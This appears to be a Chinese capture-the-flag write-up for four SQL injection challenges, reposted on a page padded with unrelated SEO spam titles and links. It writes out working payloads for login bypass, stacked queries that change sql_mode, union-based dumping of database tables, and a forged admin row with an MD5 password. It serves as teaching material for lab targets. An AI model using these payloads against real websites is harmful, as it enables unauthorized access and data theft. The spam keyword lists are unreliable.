当前位置：首页 > news >正文

做化学合成的网站有哪些关键词优化排名的步骤

news 2025/8/18 18:43:11

做化学合成的网站有哪些,关键词优化排名的步骤,布吉网站建设哪家效益快,wordpress2级目录伪静态[极客大挑战 2019]EasySQL 进行简单的尝试，就知道是单引号的字符型注入万能密码进行一个简单的尝试结果就出来了还是要了解一下原理输入的是1，形成的sql语句是错误的SELECT*FROM table_name WHERE username1and password123; 第一个单引号和第二个…

[极客大挑战 2019]EasySQL

进行简单的尝试，就知道是单引号的字符型注入

万能密码进行一个简单的尝试

结果就出来了

还是要了解一下原理

输入的是1'，形成的sql语句是错误的
SELECT*FROM table_name WHERE username='1''and password='123';
第一个单引号和第二个单引号形成了新的闭合，剩余第三个单引号，组成的sql语句不正确，于是语句报错，页面就会出现错误。

[SUCTF 2019]EasySQL

当我们输入非零数字的时候，页面上有回显，用0也是什么都没有，字母也是什么都没有

我们就直接尝试一下命令

1;show databases;

1;show tables; 发现一个表为flag

猜答案应该就会在flag表中，那么就可以查一下看看

1;show columns from Flag （1;show columns from用来查询表中列名称）

没有回显，应该是flag也是被过滤了，想了一下，其实在查询的数据库的时候就应该要发现是堆叠注入，自己对堆叠注入还是不了解，刚刚没有看出来。

修改sql_mode的值，将||视为字符串的连接操作符而或非运算符，即set sql_mode=PIPES_AS_CONCAT;

也就是堆叠注入下可以改变sql的||符号的作用，就让||实现连接的功能

让 || 变成类似 concat() 函数

看看后台的查询语句

$sql = "select ".$post['query']."||flag from Flag";

区别

在MySQL中，操作符||表示“或”逻辑也就是只要有一个为真就可以为真了。

mssql中||表示连接操作符，不表示或的逻辑

union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于 union或者 union all 执行的语句类型是有限的，可以用来执行查询语句，例如查库，表之类的，而堆叠注入可以执行的是任意的语句，将多条语句进行执行，;代表一条语句的结束。

payload

1;set sql_mode=pipes_as_concat;select 1

非预期

尝试之后就会发现没有过滤*

payload: *,1
查询flag
拼接之后的语句为
select *,1 || flag from flag

先查找全部，再去查找1

最后也是可以拿到结果的

[极客大挑战 2019]LoveSQL

尝试一下万能密码

看看回显位置

1' union select 1,2,3#

发现是在2和3 回显

字段

1'order by 4#

只有三个字段

数据库

1' union select 1,database(),version()#

表

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

发现有二张表

geekuser
l0ve1ysq1

先看第一个

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

下一个也是一样的

也是先读取第一张表的内容

1' union select 1,2,group_concat(id,username,password) from geekuser#

下一张表的内容

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

发现这一张表的内容有许多，在后面就会发现答案。

[GXYCTF2019]BabySQli

看看源代码

base32后base64

base32 只有大写字母和数字数字组成，或者后面有三个等号。
base64 只有大写字母和数字，小写字母组成，后面一般是两个等号

到这里就暂时没有思路了

先看看列数

1' order by 1,2,3#

是不是被过滤了，大写看看

就知道有三列，并且还过滤了order

回显位置

1' union select 1,2,3#

利用sqli的特性：在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据。

select * from user where username = 'wxs' union select 1,'admin','123456';

临时创建了一个admin用户，密码是123456

那就可以随便构建一个密码

123456

MD5 e10adc3949ba59abbe56e057f20f883e

payload

1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456

数据库会将123456的MD5值与里面的相比较，如果匹配成功，就会返回flag

查看全文

http://www.dinnco.com/news/138881.html

简约个人网站模板百度广告代运营公司

网上祭奠类网站怎么做泰安短视频seo

产品摄影网站seo关键词快速排名软件

佛山市建网站做网站费用广告投放这个工作难不难做

wordpress 5.0.2企业站主题seo网站优化

做虾皮网站北京网络优化

做网站一年大概的盈利万网域名管理入口

跨境电商亚马逊开店流程北京seo公司

建站公司网站建设搜索引擎seo关键词优化效果

专做PPP项目网站沈阳seo优化新势力

网页设计与网站建设ppt快速网络推广

天津餐饮网站建设高端网站建设专业公司

[极客大挑战 2019]EasySQL

[SUCTF 2019]EasySQL

[极客大挑战 2019]LoveSQL

[GXYCTF2019]BabySQli

相关文章：